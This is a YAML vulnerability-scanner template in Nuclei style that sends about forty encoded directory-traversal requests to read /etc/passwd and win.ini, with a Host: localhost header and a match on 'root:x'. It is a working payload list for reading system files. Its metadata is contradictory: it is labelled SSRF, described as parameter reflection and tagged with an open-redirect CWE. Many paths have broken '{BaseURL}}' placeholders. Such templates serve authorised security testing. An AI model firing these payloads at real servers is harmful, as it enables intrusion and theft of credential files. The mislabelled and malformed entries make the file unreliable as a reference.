id: lfi_localhost_lfiiii

info:
  name: SSRF via GET
  author: xandsz
  severity: medium
  description: |
    Verifica parâmetros ocultos que podem refletir no HTML da página e possibilitar SSRF (Server-Side Request Forgery).
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 2
  tags: fuzzer, generic

http:
  - method: GET
    path:
      - "{{BaseURL}}:8080/etc/passwd"
      - "{{BaseURL}}:8080/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
      - '{{BaseURL}}8080:/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini'
      - '{{BaseURL}}8080:/%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd'
      - '{{BaseURL}}///file:%2f%2f/etc/passwd'
      - '{{BaseURL}}:8080/../../../../../../../../../etc/passwd'
      - '{{BaseURL}}:8081/../../../../../../../../../etc/passwd'
      - '{{BaseURL}}:8080/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
      - '{BaseURL}}:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
      - '{BaseURL}}:8080/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
      - '{BaseURL}}:8080/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd'
      - '{BaseURL}}:8080/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd'
      - '{BaseURL}}:8080/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd'
      - '{BaseURL}}:8080/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%afetc/passwd'
      - '{BaseURL}}:8081/../../../../../../../../../../etc/passwd'
      - '{BaseURL}}:8081/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
      - '{BaseURL}}:8081/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
      - '{BaseURL}}:8081/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd'
      - '{BaseURL}}:8081/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd'
      - '{BaseURL}}:8081/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd'
      - '{BaseURL}}:8081/..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%afetc/passwd'
      - '{{BaseURL}}///////////////////etc/passwd'
      - '{{BaseURL}}///////////////////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd'
      - '{{BaseURL}}///////////////////%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini'
      - '{{BaseURL}}///////////////////%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd'
      - '{{BaseURL}}//////////////////file:%2f%2f/etc/passwd'
      - '{{BaseURL}}/..////../../../../../../../../etc/passwd'
      - '{{BaseURL}}/..////../../../../../../../../etc/passwd'
      - '{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
      - '{BaseURL}}//////////////////..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
      - '{BaseURL}}//////////////////..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
      - '{BaseURL}}//////////////////..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd'
      - '{BaseURL}}//////////////////..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd'
      - '{BaseURL}}//////////////////..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd'
      - '{BaseURL}}//////////////////..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%afetc/passwd'
      - '{BaseURL}}//////////////////../../../../../../../../../../etc/passwd'
      - '{BaseURL}}//////////////////..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
      - '{BaseURL}}//////////////////..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
      - '{BaseURL}}//////////////////..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd'
      - '{BaseURL}}//////////////////..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc/passwd'
      - '{BaseURL}}//////////////////..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd'
      - '{BaseURL}}//////////////////..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%af..%f0%80%80%afetc/passwd'
    headers:
      Host: localhost

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "root:x"
